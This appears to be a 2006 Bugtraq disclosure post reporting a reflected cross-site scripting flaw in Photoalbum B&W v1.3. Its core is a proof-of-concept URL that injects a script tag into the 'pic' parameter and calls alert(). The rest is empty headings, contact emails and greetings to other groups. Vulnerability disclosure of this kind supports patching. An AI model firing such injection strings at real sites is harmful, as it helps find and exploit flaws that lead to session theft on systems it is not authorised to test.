
Date: 28 May 2006 22:04:04 -0000
From: black-cod3@...mail.com
To: bugtraq@...urityfocus.com
Subject: Xss exploit in Photoalbum B&W v1.3


Xss exploit in Photoalbum B&W v1.3

forum type : Photoalbum B&W v1.3
bug found by : black-code & sweet-devil
team : site-down
type : Xss

####################################################
exploit :


http://www.example.com/superalbum/index.php?pic='><script>alert(10)</script>

####################################################

path to admin login:

#######################
emails: 

black-cod3@...mail.com  &  gamr-14@...mail.com
#######################


All my respect to our friends , lezr.com , g123g.net 


done .. peace


